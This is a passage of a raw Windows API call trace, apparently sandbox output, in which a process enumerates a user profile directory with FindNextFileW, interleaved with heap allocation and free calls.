nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b51d8 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5230 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x31a4610 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5180 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5390 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b53e8 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3bf8 | out: hHeap=0x630000) returned 1 [0227.735] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5230 | out: hHeap=0x630000) returned 1 [0227.735] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b51d8 | out: hHeap=0x630000) returned 1 [0227.736] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbd48c60, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbd48c60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b51d8 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x6932b0 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b51d8 | out: hHeap=0x630000) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932b0 | out: hHeap=0x630000) returned 1 [0227.736] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b51d8 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x6932b0 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b51d8 | out: hHeap=0x630000) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x31a4298 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b51d8 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x7119d0 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5230 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b53e8 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5390 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5180 | out: hHeap=0x630000) returned 1 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5440 | out: hHeap=0x630000) returned 1 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.736] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932b0 | out: hHeap=0x630000) returned 1 [0227.736] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0227.736] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x6932b0 [0227.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0227.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932b0 | out: hHeap=0x630000) returned 1 [0227.737] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0227.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0227.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0227.737] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6b30 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x6a3b30 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5288 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6b98 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5498 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5180 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b54f0 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6c00 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6c68 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6cd0 [0227.737] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5548 [0227.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b51d8 | out: hHeap=0x630000) returned 1 [0227.737] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7119d0 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5230 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b53e8 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5390 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5440 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0227.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.738] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbde11e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbde11e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0227.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0227.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5390 [0227.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b53e8 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5390 | out: hHeap=0x630000) returned 1 [0227.738] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5440 | out: hHeap=0x630000) returned 1 [0227.738] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0227.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0227.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5390 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5230 [0227.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5390 | out: hHeap=0x630000) returned 1 [0227.739] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5440 | out: hHeap=0x630000) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x254a2d90, ftLastAccessTime.dwHighDateTime=0x1d5fd35, ftLastWriteTime.dwLowDateTime=0x254a2d90, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2547cc30, ftLastWriteTime.dwHighDateTime=0x1d5fd35, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0227.739] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdbff6520, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbff6520, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5390 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x31c0d08 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b51d8 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711968 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b55a0 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b55f8 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5650 [0227.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0227.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x7119d0 [0227.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6b30 [0227.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b56a8 [0227.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6d38 [0227.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5700 [0227.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6da0 [0227.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5758 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5288 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b98 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5180 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b54f0 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c00 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c68 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6cd0 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5548 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b53e8 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5230 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a3b30 | out: hHeap=0x630000) returned 1 [0227.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5230 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5390 | out: hHeap=0x630000) returned 1 [0227.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5440 | out: hHeap=0x630000) returned 1 [0227.740] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0227.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x6932b0 [0227.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5440 | out: hHeap=0x630000) returned 1 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0227.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932b0 | out: hHeap=0x630000) returned 1 [0227.741] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5440 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5390 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b53e8 [0227.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5390 | out: hHeap=0x630000) returned 1 [0227.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5440 | out: hHeap=0x630000) returned 1 [0227.741] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6cd0 [0227.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x31f6c68 [0227.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6cd0 | out: hHeap=0x630000) returned 1 [0227.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0227.741] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, 